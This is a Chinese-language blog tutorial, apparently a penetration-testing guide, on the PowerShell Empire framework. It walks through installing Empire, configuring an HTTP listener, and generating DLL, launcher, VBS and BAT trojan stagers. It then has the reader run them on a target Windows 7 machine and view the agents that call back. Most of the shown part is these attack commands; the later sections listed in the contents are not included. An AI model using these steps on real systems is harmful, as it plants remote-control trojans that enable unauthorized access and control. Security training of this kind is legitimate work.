Powershell攻击指南2——Empire

目录

Empire

1.介绍

2.安装

3.使用监听

4.生成木马

4.1 DLL木马

4.2 launcher

4.3 launcher_vbs木马

4.4 launcher_bat木马

4.5 Macro木马

4.6Ducky

连接主机及基本使用

1.查看已经连接的主机

2.interact命令连接主机

3.信息收集

4.权限提升

5.横向渗透

6.后门

Empire反弹回Metasploit



Empire

1.介绍

Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一-系列功能。Empire实现了无需powershell.exe就可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块,
其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,并且能够躲避网络检测和大部分安全防护工具的查杀,简单来说有点类似于Metasploit,是一个基于PowerShell的远程控制木马。

2.安装

git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire --rest -n

kali:
sudo apt install powershell-empire

3.使用监听


help

 

3.1输入Listeners进入监听线程界面

listeners
uselistener http
info

3.2配置监听

(Empire: listeners/http) > set Name shuteer
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > execute

 

4.生成木马

usestager TAB键查看木马模块
multi通用模块,osx是Mac系统模块

 

4.1 DLL木马

usestager windows/dll
info
set Listener shuteer
execute

4.2 launcher

launcher powershell shuteer

 

4.2.2复制powershell命令在目标机器win7执行

 

4.2.3使用agents模块查看上线机器

agents
rename EWGT63DU us    #更改主机名

 

4.3 launcher_vbs木马

usestager windows/launcher_vbs
set Listener shutteer
info
execute

使用msf上传vbs木马到目标机器并执行

 

agents查看上线目标

 

4.4 launcher_bat木马

usestager windows/launcher_bat
info

(Empire: stager/windows/launcher_bat) > set Listener shuteer
(Empire: stager/windows/launcher_bat) > execute

 

上传木马文件并执行

 

查看连接

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值